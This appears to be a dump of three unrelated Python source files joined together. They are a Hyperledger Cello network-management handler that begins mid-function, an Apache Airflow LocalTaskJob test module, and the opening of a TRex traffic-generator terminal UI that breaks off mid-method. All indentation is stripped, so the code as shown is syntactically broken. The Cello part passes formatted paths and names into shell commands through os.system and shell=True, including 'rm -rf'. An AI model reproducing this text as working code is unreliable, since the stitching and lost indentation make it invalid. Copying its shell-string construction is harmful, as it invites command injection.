network = modelv2.BlockchainNetwork(id=id,
name=name,
description=description,
fabric_version=fabric_version,
orderer_orgs=orderer_orgs,
peer_orgs=peer_orgs,
host=host,
consensus_type=consensus_type,
db_type=db_type,
create_ts=create_ts,
status="creating")
network.save()
order_orgs_domain = []
for each in orderer_org_dicts:
if each['domain'] not in order_orgs_domain:
order_orgs_domain.append(each['domain'])
else:
network.delete()
error_msg = ': orderer\'s domain in one network can not be same!'
raise Exception(error_msg)
couchdb_enabled = False
if db_type == 'couchdb':
couchdb_enabled = True
### get fabric service ports
peer_org_num = len(peer_org_dicts)
peer_num = 0
orderer_num = 0
# zsh修改,原本在_create_network中,为组织增加network信息,前调到这里
for org in peer_org_dicts:
peer_num += org['peerNum']
org_obj = modelv2.Organization.objects.get(id=org['id'])
org_obj.update(set__network=network)
for org in orderer_org_dicts:
orderer_num += len(org['ordererHostnames'])
org_obj = modelv2.Organization.objects.get(id=org['id'])
org_obj.update(set__network=network)
if couchdb_enabled is True:
request_host_port_num = peer_org_num * CA_NODE_HOSTPORT_NUM + \
peer_num * PEER_NODE_HOSTPORT_NUM + \
peer_num * COUCHDB_NODE_HOSTPORT_NUM + \
orderer_num * ORDERER_NODE_HOSTPORT_NUM
else:
request_host_port_num = peer_org_num * CA_NODE_HOSTPORT_NUM + \
peer_num * PEER_NODE_HOSTPORT_NUM + \
orderer_num * ORDERER_NODE_HOSTPORT_NUM
request_host_ports = self.find_free_start_ports (request_host_port_num, host)
if len(request_host_ports) != request_host_port_num:
error_msg = "no enough ports for network service containers"
logger.error(error_msg)
raise Exception(error_msg)
# create persistent volume path for peer and orderer node
# TODO : code here
logger.info(" before function file_define.commad_create_path,and path is")
# create public.key or private.key
isExist = file_define.creat_secret_key_files()
if not isExist:
logger.error(" after function file_define.creat_secret_key_files, and it is {} ".format(isExist))
# create filepath with network_id at path FABRIC_DIR
filepath = file_define.commad_create_path(id)
print("filepath = {}".format(filepath))
logger.info(" after function file_define.commad_create_path,and path is {}".format(filepath))
# create crypto-config.yaml file at filepath
file_define.dump_crypto_config_yaml_file(filepath, peer_org_dicts, orderer_org_dicts)
# create configtx.yaml file
file_define.dump_configtx_yaml_file(filepath, consensus_type, peer_org_dicts, orderer_org_dicts,
fabric_version, request_host_ports)
# create channel-artifacts path
blockGenesis_filepath = '{}{}/channel-artifacts'.format(CELLO_MASTER_FABRIC_DIR, id)
try:
os.system('mkdir -p {}'.format(blockGenesis_filepath))
except:
error_msg = 'blockGenesis_filepath file create failed.'
# raise FileOperaterFailed(error_msg)
try:
fabric_version_dir = fabric_version.replace('.', '_')
# change work dir to '/opt'
# origin_dir = os.getcwd()
os.chdir(filepath)
# print(os.getcwd())
# create certificates
call(["/opt/fabric_tools/{}/cryptogen".format(fabric_version_dir), "generate", "--config=./crypto-config.yaml"])
# create genesis.block and channel configuration blocks
call(["/opt/fabric_tools/{}/configtxgen".format(fabric_version_dir), "-profile", "TwoOrgsOrdererGenesis", "-outputBlock",
"./channel-artifacts/genesis.block"])
# call(["/opt/configtxgen","-profile","TwoOrgsChannel","-outputCreateChannelTx","./channel-artifacts/channel.tx","-channelID","mychannel"])
# call(["/opt/configtxgen","-profile","TwoOrgsChannel","-outputAnchorPeersUpdate","./channel-artifacts/Org1MSPanchors.tx",\
# "-channelID","mychannel","-asOrg","Org1MSP"])
# call(["/opt/configtxgen","-profile","TwoOrgsChannel","-outputAnchorPeersUpdate","./channel-artifacts/Org2MSPanchors.tx",\
# "-channelID","mychannel","-asOrg","Org2MSP"])
# change back
# for k8s orderer node to use genesis.block
shutil.copy('{}/genesis.block'.format(blockGenesis_filepath), '{}{}/crypto-config/ordererOrganizations/'.
format(CELLO_MASTER_FABRIC_DIR, id))
# os.chdir(origin_dir)
except Exception as e:
error_msg = 'create certificate or genesis block failed!'
self.remove_network(network)
raise Exception(error_msg)
try:
# create fabric-ca-server-config.yaml file
file_define.fabric_ca_config_files(id, fabric_version, CELLO_MASTER_FABRIC_DIR, peer_org_dicts)
except:
error_msg = 'create fabric_ca_config_files failed!.'
self.remove_network(network)
raise Exception(error_msg)
# use network model to get?
# no. network models only have org ids, no details needed
network_config = {'id':id, 'name': name, 'fabric_version': fabric_version,
'orderer_org_dicts': orderer_org_dicts, 'peer_org_dicts': peer_org_dicts,
'consensus_type': consensus_type, 'db_type': db_type, 'host':host}
t = Thread(target=self._create_network, args=(network_config, request_host_ports))
t.start()
return self._schema(network)
def addorgtonetwork(self, id, peer_orgs, orderer_orgs):
ins = modelv2.BlockchainNetwork.objects.get(id=id)
host = ins.host
consensus_type = ins.consensus_type
fabric_version = ins.fabric_version
name = ins.name
peer_org_dicts = []
orderer_org_dicts = []
peer_orgs_temp = ins.peer_orgs
orderer_orgs_temp = ins.orderer_orgs
if peer_orgs != None:
for org_id in peer_orgs:
peer_org_dict = org_handler().schema(org_handler().get_by_id(org_id))
peer_org_dicts.append(peer_org_dict)
peer_orgs_temp.append(org_id)
if orderer_orgs != None:
org_id = orderer_orgs
orderer_org_dict = org_handler().schema(org_handler().get_by_id(org_id))
orderer_org_dicts.append(orderer_org_dict)
orderer_orgs_temp.append(org_id)
db_type = ins.db_type
couchdb_enabled = False
if db_type == 'couchdb':
couchdb_enabled = True
### get fabric service ports
peer_org_num = len(peer_org_dicts)
peer_num = 0
orderer_num = 0
for org in peer_org_dicts:
peer_num += org['peerNum']
for org in orderer_org_dicts:
orderer_num += len(org['ordererHostnames'])
if couchdb_enabled is True:
request_host_port_num = peer_org_num * CA_NODE_HOSTPORT_NUM + \
peer_num * PEER_NODE_HOSTPORT_NUM + \
peer_num * COUCHDB_NODE_HOSTPORT_NUM + \
orderer_num * ORDERER_NODE_HOSTPORT_NUM
else:
request_host_port_num = peer_org_num * CA_NODE_HOSTPORT_NUM + \
peer_num * PEER_NODE_HOSTPORT_NUM + \
orderer_num * ORDERER_NODE_HOSTPORT_NUM
request_host_ports = self.find_free_start_ports(request_host_port_num, host)
if len(request_host_ports) != request_host_port_num:
error_msg = "no enough ports for network service containers"
logger.error(error_msg)
raise Exception(error_msg)
#logger.info(" before function file_define.commad_create_path,and path is")
# create filepath with network_id at path FABRIC_DIR
filepath = file_define.commad_create_path(id)
print("filepath = {}".format(filepath))
#logger.info(" after function file_define.commad_create_path,and path is {}".format(filepath))
# create crypto-config.yaml file at filepath
file_define.update_crypto_config_yaml_file(filepath, peer_org_dicts, orderer_org_dicts)
# create configtx.yaml file
file_define.update_dump_configtx_yaml_file(filepath, peer_org_dicts, orderer_org_dicts, request_host_ports)
try:
# change work dir to '/opt'
origin_dir = os.getcwd()
os.chdir(filepath)
print(os.getcwd())
# create certificates
call("/opt/fabric_tools/v1_4/cryptogen extend --config=%s/crypto-config.yaml" % filepath, shell=True)
os.chdir(origin_dir)
#os.system('rm -r {}'.format(fileorgpath))
except:
error_msg = 'create certificate or genesis block failed!'
raise Exception(error_msg)
self.createyamlforneworgs(id, peer_orgs,orderer_orgs)
self.sys_channelInfo_update(id, peer_org_dicts)
ins.update(set__peer_orgs=peer_orgs_temp)
self.sys_channelOrderer_update(id, orderer_org_dicts, request_host_ports)
ins.update(set__orderer_orgs=orderer_orgs_temp)
try:
# create fabric-ca-server-config.yaml file
file_define.fabric_ca_config_files(id, fabric_version, CELLO_MASTER_FABRIC_DIR, peer_org_dicts)
except:
error_msg = 'create fabric_ca_config_files failed!.'
raise Exception(error_msg)
# use network model to get?
# network models only have org ids, no details needed
network_config = {'id':id, 'name': name, 'fabric_version': fabric_version,
'orderer_org_dicts': orderer_org_dicts, 'peer_org_dicts': peer_org_dicts,
'consensus_type': consensus_type, 'db_type': db_type, 'host':host}
t = Thread(target=self._update_network, args=(network_config, request_host_ports))
t.start()
return self._schema(ins)
def addpeertonetwork(self, id, peer_org, peers_num):
ins = modelv2.BlockchainNetwork.objects.get(id=id)
host = ins.host
fabric_version = ins.fabric_version
name = ins.name
peer_org_dict = org_handler().schema(org_handler().get_by_id(peer_org))
db_type = ins.db_type
couchdb_enabled = False
if db_type == 'couchdb':
couchdb_enabled = True
### get fabric service ports
peer_num = peers_num
peer_org_dict['peerNum'] += peers_num
if couchdb_enabled is True:
request_host_port_num = peer_num * PEER_NODE_HOSTPORT_NUM + \
peer_num * COUCHDB_NODE_HOSTPORT_NUM
else:
request_host_port_num = peer_num * PEER_NODE_HOSTPORT_NUM
request_host_ports = self.find_free_start_ports(request_host_port_num, host)
if len(request_host_ports) != request_host_port_num:
error_msg = "no enough ports for network service containers"
logger.error(error_msg)
raise Exception(error_msg)
# logger.info(" before function file_define.commad_create_path,and path is")
# create filepath with network_id at path FABRIC_DIR
filepath = file_define.commad_create_path(id)
print("filepath = {}".format(filepath))
# logger.info(" after function file_define.commad_create_path,and path is {}".format(filepath))
# create crypto-config.yaml file at filepath
file_define.update_crypto_file_for_addpeers(filepath, peer_org_dict, peers_num)
try:
# change work dir to '/opt'
origin_dir = os.getcwd()
os.chdir(filepath)
print(os.getcwd())
# create certificates
call("/opt/fabric_tools/v1_4/cryptogen extend --config=%s/crypto-config.yaml" % filepath, shell=True)
os.chdir(origin_dir)
# os.system('rm -r {}'.format(fileorgpath))
except:
error_msg = 'create certificate or genesis block failed!'
raise Exception(error_msg)
try:
sk_file = ''
org_name = peer_org_dict['name']
org_domain = peer_org_dict['domain']
org_fullDomain_name = '.'.join([org_name, org_domain])
ca_dir = '/opt/fabric/{net_dir}/crypto-config/peerOrganizations/{org_fullDomain_name}/ca/'. \
format(net_dir=id, org_fullDomain_name=org_fullDomain_name)
for f in os.listdir(ca_dir): # find out sk!
if f.endswith("_sk"):
sk_file = f
peer_org_dict['sk_file'] = sk_file
except:
error_msg = 'create_userdashboard failed!.'
raise Exception(error_msg)
# use network model to get?
# network models only have org ids, no details needed
network_config = {'id': id, 'name': name, 'fabric_version': fabric_version,
'peer_org_dict': peer_org_dict, 'peer_num':peers_num,
'db_type': db_type}
t = Thread(target=self._update_network_for_addpeers, args=(network_config, request_host_ports))
t.start()
return self._schema(ins)
def createyamlforneworgs(self, id, peer_orgs,orderer_orgs):
ins = modelv2.BlockchainNetwork.objects.get(id=id)
filepath = file_define.commad_create_path(id)
print("filepath = {}".format(filepath))
for org_id in peer_orgs:
peer_org_dict = org_handler().schema(org_handler().get_by_id(org_id))
fileorgpath = '{}/{}'.format(filepath,org_id)
os.system('mkdir -p {}/crypto-config/peerOrganizations/'.format(fileorgpath))
try:
# change work dir to '/opt'
origin_dir = os.getcwd()
os.chdir(fileorgpath)
print(os.getcwd())
os.system("export FABRIC_CFG_PATH=$PWD")
mspid = '{}MSP'.format(peer_org_dict['name'][0:1].upper()+peer_org_dict['name'][1:])
orgname = peer_org_dict['name']
org_domain = peer_org_dict['domain']
orgdir = '{}.{}'.format(orgname,org_domain)
#call("/opt/fabric_tools/v1_1/cryptogen generate --config=%s/crypto-config.yaml" % fileorgpath, shell=True)
os.system('cp -r {}/crypto-config/peerOrganizations/{} {}/crypto-config/peerOrganizations/'.format(filepath, orgdir, fileorgpath))
os.system('cp -r {}/configtx.yaml {}/'.format(filepath,fileorgpath))
call("/opt/fabric_tools/v1_4/configtxgen -printOrg %s > ../channel-artifacts/%s.json" % (mspid, orgname), shell=True)
os.chdir(origin_dir)
os.system('rm -r {}'.format(fileorgpath))
except:
error_msg = 'create certificate or genesis block failed!'
raise Exception(error_msg)
if orderer_orgs != None:
org_id = orderer_orgs[0]
orderer_org_dict = org_handler().schema(org_handler().get_by_id(org_id))
fileorgpath = '{}/{}'.format(filepath,org_id)
os.system('mkdir -p {}/crypto-config/ordererOrganizations/'.format(fileorgpath))
try:
# change work dir to '/opt'
origin_dir = os.getcwd()
os.chdir(fileorgpath)
print(os.getcwd())
os.system("export FABRIC_CFG_PATH=$PWD")
mspid = '{}Org'.format(orderer_org_dict['name'][0:1].upper()+orderer_org_dict['name'][1:])
orgname = orderer_org_dict['name']
org_domain = orderer_org_dict['domain']
orgdir = '{}'.format(org_domain)
#call("/opt/fabric_tools/v1_1/cryptogen generate --config=%s/crypto-config.yaml" % fileorgpath, shell=True)
os.system('cp -r {}/crypto-config/ordererOrganizations/{} {}/crypto-config/ordererOrganizations/'.format(filepath, orgdir, fileorgpath))
os.system('cp -r {}/configtx.yaml {}/'.format(filepath,fileorgpath))
call("/opt/fabric_tools/v1_4/configtxgen -printOrg %s > ../channel-artifacts/%s.json" % (mspid, orgname), shell=True)
os.chdir(origin_dir)
os.system('rm -r {}'.format(fileorgpath))
except:
error_msg = 'create certificate or genesis block failed!'
raise Exception(error_msg)
return self._schema(ins)
def list(self, filter_data={}):
logger.info("filter data {}".format(filter_data))
networks = modelv2.BlockchainNetwork.objects(__raw__=filter_data)
return self._schema(networks, many=True)
def sys_channelInfo_update(self, blockchain_network_id, peer_org_dicts):
service_object = self.get_endpoints_list(blockchain_network_id)
organizations_object = org_handler.get_by_networkid(self, blockchain_network_id)
organizations=[]
for each in organizations_object:
organization = org_handler().schema(org_handler().get_by_id(each['id']))
organizations.append(organization)
body =\
{
"sysChannel": {
"service_object": service_object,
"organizations_object": organizations,
"peer_org_dicts": peer_org_dicts
}
}
headers = { "Content-Type": "application/json"}
rest_api = 'http://user-dashboard:8081/v2/sys_channel/{}'.format(blockchain_network_id)
res = requests.post(rest_api, data=json.dumps(body), headers=headers)
if res.status_code == 200:
print("update syschannel from order success")
return
def sys_channelOrderer_update(self, blockchain_network_id, orderer_org_dicts,request_host_ports):
service_object = self.get_endpoints_list(blockchain_network_id)
organizations_object = org_handler.get_by_networkid(self, blockchain_network_id)
organizations=[]
for each in organizations_object:
organization = org_handler().schema(org_handler().get_by_id(each['id']))
organizations.append(organization)
body =\
{
"sysChannel": {
"service_object": service_object,
"organizations_object": organizations,
"orderer_org_dicts": orderer_org_dicts,
"request_host_ports":request_host_ports
}
}
headers = { "Content-Type": "application/json"}
rest_api = 'http://user-dashboard:8081/v2/sys_channel_orderer/{}'.format(blockchain_network_id)
res = requests.post(rest_api, data=json.dumps(body), headers=headers)
if res.status_code == 200:
print("update syschannel from order success")
return
def userdashboard_mongo_delete(self, blockchain_network_id):
rest_api = 'http://user-dashboard:8081/v2/resources'
body = \
{
"blockchain_network_id": blockchain_network_id
}
headers = {"Content-Type": "application/json"}
res = requests.post(rest_api, data=json.dumps(body), headers=headers)
if res.status_code == 200:
print("delete userdashboard Mongo datas success")
return
def remove_network(self, network):
try:
network.update(set__status='deleting')
# remove cluster info from host
logger.info("remove network from host, network:{}".format(network.id))
# if org has referenced network, remove
for org_id in network.peer_orgs:
peer_org = org_handler().schema(org_handler().get_by_id(org_id))
host_id = peer_org['host_id']
host = host_handler.get_active_host_by_id(host_id)
host.update(pull__clusters=network.id)
org_obj = modelv2.Organization.objects.get(id=org_id)
org_obj.update(unset__network=network.id)
for org_id in network.orderer_orgs:
orderer_org = org_handler().schema(org_handler().get_by_id(org_id))
host_id = orderer_org['host_id']
host = host_handler.get_active_host_by_id(host_id)
host.update(pull__clusters=network.id)
org_obj = modelv2.Organization.objects.get(id=org_id)
org_obj.update(unset__network=network.id)
# 从Userdashboard的mongo中删除该network相关的数据
# self.userdashboard_mongo_delete(network.id)
network.delete()
filepath = '{}{}'.format(CELLO_MASTER_FABRIC_DIR, network.id)
os.system('rm -rf {}'.format(filepath))
except Exception as e:
logger.error("network remove failed for {}".format(e))
raise e
|
test_local_task_job.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import multiprocessing
import os
import time
import unittest
import uuid
from unittest import mock
import pytest
from mock import patch
from airflow import settings
from airflow.exceptions import AirflowException
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.models.dag import DAG
from airflow.models.dagbag import DagBag
from airflow.models.taskinstance import TaskInstance
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.utils import timezone
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.test_utils.asserts import assert_queries_count
from tests.test_utils.db import clear_db_jobs, clear_db_runs
from tests.test_utils.mock_executor import MockExecutor
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TEST_DAG_FOLDER = os.environ['AIRFLOW__CORE__DAGS_FOLDER']
class TestLocalTaskJob(unittest.TestCase):
def setUp(self):
clear_db_jobs()
clear_db_runs()
patcher = patch('airflow.jobs.base_job.sleep')
self.addCleanup(patcher.stop)
self.mock_base_job_sleep = patcher.start()
def tearDown(self) -> None:
clear_db_jobs()
clear_db_runs()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@patch('os.getpid')
def test_heartbeat_failed_fast(self, mock_getpid):
"""
Test that task heartbeat will sleep when it fails fast
"""
mock_getpid.return_value = 1
self.mock_base_job_sleep.side_effect = time.sleep
with create_session() as session:
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag_id = 'test_heartbeat_failed_fast'
task_id = 'test_heartbeat_failed_fast_op'
dag = dagbag.get_dag(dag_id)
task = dag.get_task(task_id)
dag.create_dagrun(run_id="test_heartbeat_failed_fast_run",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
job = LocalTaskJob(task_instance=ti, executor=MockExecutor(do_update=False))
job.heartrate = 2
heartbeat_records = []
job.heartbeat_callback = lambda session: heartbeat_records.append(job.latest_heartbeat)
job._execute()
self.assertGreater(len(heartbeat_records), 2)
for i in range(1, len(heartbeat_records)):
time1 = heartbeat_records[i - 1]
time2 = heartbeat_records[i]
# Assert that difference small enough
delta = (time2 - time1).total_seconds()
self.assertAlmostEqual(delta, job.heartrate, delta=0.05)
@pytest.mark.xfail(condition=True, reason="This test might be flaky in postgres/mysql")
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
def test_localtaskjob_maintain_heart_rate(self):
dagbag = DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
# this should make sure we only heartbeat once and exit at the second
# loop in _execute()
return_codes = [None, 0]
def multi_return_code():
return return_codes.pop(0)
time_start = time.time()
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_start:
with patch.object(StandardTaskRunner, 'return_code') as mock_ret_code:
mock_ret_code.side_effect = multi_return_code
job1.run()
self.assertEqual(mock_start.call_count, 1)
self.assertEqual(mock_ret_code.call_count, 2)
time_end = time.time()
self.assertEqual(self.mock_base_job_sleep.call_count, 1)
self.assertEqual(job1.state, State.SUCCESS)
# Consider we have patched sleep call, it should not be sleeping to
# keep up with the heart rate in other unpatched places
#
# We already make sure patched sleep call is only called once
self.assertLess(time_end - time_start, job1.heartrate)
session.close()
def test_mark_failure_on_failure_callback(self):
"""
Test that ensures that mark_failure in the UI fails
the task, and executes on_failure_callback
"""
data = {'called': False}
def check_failure(context):
self.assertEqual(context['dag_run'].dag_id, 'test_mark_failure')
data['called'] = True
def task_function(ti):
print("python_callable run in pid %s", os.getpid())
with create_session() as session:
self.assertEqual(State.RUNNING, ti.state)
ti.log.info("Marking TI as failed 'externally'")
ti.state = State.FAILED
session.merge(ti)
session.commit()
time.sleep(60)
# This should not happen -- the state change should be noticed and the task should get killed
data['reached_end_of_sleep'] = True
with DAG(dag_id='test_mark_failure', start_date=DEFAULT_DATE) as dag:
task = PythonOperator(
task_id='test_state_succeeded1',
python_callable=task_function,
on_failure_callback=check_failure)
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
with timeout(30):
# This should be _much_ shorter to run.
# If you change this limit, make the timeout in the callbable above bigger
job1.run()
ti.refresh_from_db()
self.assertEqual(ti.state, State.FAILED)
self.assertTrue(data['called'])
self.assertNotIn('reached_end_of_sleep', data,
'Task should not have been allowed to run to completion')
def test_mark_success_on_success_callback(self):
"""
Test that ensures that where a task is marked suceess in the UI
on_success_callback gets executed
"""
data = {'called': False}
def success_callback(context):
self.assertEqual(context['dag_run'].dag_id,
'test_mark_success')
data['called'] = True
dag = DAG(dag_id='test_mark_success',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
task = DummyOperator(
task_id='test_state_succeeded1',
dag=dag,
on_success_callback=success_callback)
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
job1.task_runner = StandardTaskRunner(job1)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
self.assertTrue(data['called'])
process.join(timeout=10)
self.assertFalse(process.is_alive())
@pytest.fixture()
def clean_db_helper():
yield
clear_db_jobs()
clear_db_runs()
@pytest.mark.usefixtures("clean_db_helper")
class TestLocalTaskJobPerformance:
@pytest.mark.parametrize("return_codes", [[0], 9 * [None] + [0]]) # type: ignore
@mock.patch("airflow.jobs.local_task_job.get_task_runner")
def test_number_of_queries_single_loop(self, mock_get_task_runner, return_codes):
unique_prefix = str(uuid.uuid4())
dag = DAG(dag_id=f'{unique_prefix}_test_number_of_queries', start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_state_succeeded1', dag=dag)
dag.clear()
dag.create_dagrun(run_id=unique_prefix, state=State.NONE)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
mock_get_task_runner.return_value.return_code.side_effects = return_codes
job = LocalTaskJob(task_instance=ti, executor=MockExecutor())
with assert_queries_count(12):
job.run()
|
trex_tui.py | from __future__ import print_function
import termios
import sys
import os
import time
import threading
from collections import OrderedDict, deque
from texttable import ansi_len
import datetime
import readline
if sys.version_info > (3,0):
from io import StringIO
else:
from cStringIO import StringIO
from ..utils.text_opts import *
from ..utils.common import list_intersect
from ..utils import text_tables
from ..utils.filters import ToggleFilter
from ..common.trex_exceptions import TRexError
from ..astf.trex_astf_exceptions import ASTFErrorBadTG
class TUIQuit(Exception):
pass
def ascii_split (s):
output = []
lines = s.split('\n')
for elem in lines:
if ansi_len(elem) > 0:
output.append(elem)
return output
class SimpleBar(object):
def __init__ (self, desc, pattern):
self.desc = desc
self.pattern = pattern
self.pattern_len = len(pattern)
self.index = 0
def show (self, buffer):
if self.desc:
print(format_text("{0} {1}".format(self.desc, self.pattern[self.index]), 'bold'), file = buffer)
else:
print(format_text("{0}".format(self.pattern[self.index]), 'bold'), file = buffer)
self.index = (self.index + 1) % self.pattern_len
# base type of a panel
class TrexTUIPanel(object):
def __init__ (self, mng, name):
self.mng = mng
self.name = name
self.client = mng.client
self.is_graph = False
def show (self, buffer):
raise NotImplementedError("must implement this")
def get_key_actions (self):
raise NotImplementedError("must implement this")
def get_name (self):
return self.name
# dashboard panel
class TrexTUIDashBoard(TrexTUIPanel):
FILTER_ACQUIRED = 1
FILTER_ALL = 2
def __init__ (self, mng):
super(TrexTUIDashBoard, self).__init__(mng, "dashboard")
self.ports = self.client.get_all_ports()
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
self.key_actions['p'] = {'action': self.action_pause, 'legend': 'pause', 'show': True, 'color': 'red'}
self.key_actions['r'] = {'action': self.action_resume, 'legend': 'resume', 'show': True, 'color': 'blue'}
self.key_actions['o'] = {'action': self.action_show_owned, 'legend': 'owned ports', 'show': True}
self.key_actions['n'] = {'action': self.action_reset_view, 'legend': 'reset view', 'show': True}
self.key_actions['a'] = {'action': self.action_show_all, 'legend': 'all ports', 'show': True}
# register all the ports to the toggle action
for port_id in self.ports:
self.key_actions[str(port_id)] = {'action': self.action_toggle_port(port_id), 'legend': 'port {0}'.format(port_id), 'show': False}
self.toggle_filter = ToggleFilter(self.ports)
if self.client.get_acquired_ports():
self.action_show_owned()
else:
self.action_show_all()
def get_showed_ports (self):
return self.toggle_filter.filter_items()
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
if self.get_showed_ports():
self.client._show_port_stats(ports = self.get_showed_ports(), buffer = buffer)
def get_key_actions (self):
allowed = OrderedDict()
allowed['n'] = self.key_actions['n']
allowed['o'] = self.key_actions['o']
allowed['a'] = self.key_actions['a']
for i in self.ports:
allowed[str(i)] = self.key_actions[str(i)]
if self.get_showed_ports():
allowed['c'] = self.key_actions['c']
# if not all ports are acquired - no operations
if not (set(self.get_showed_ports()) <= set(self.client.get_acquired_ports())):
return allowed
if self.client.get_mode() == 'STL':
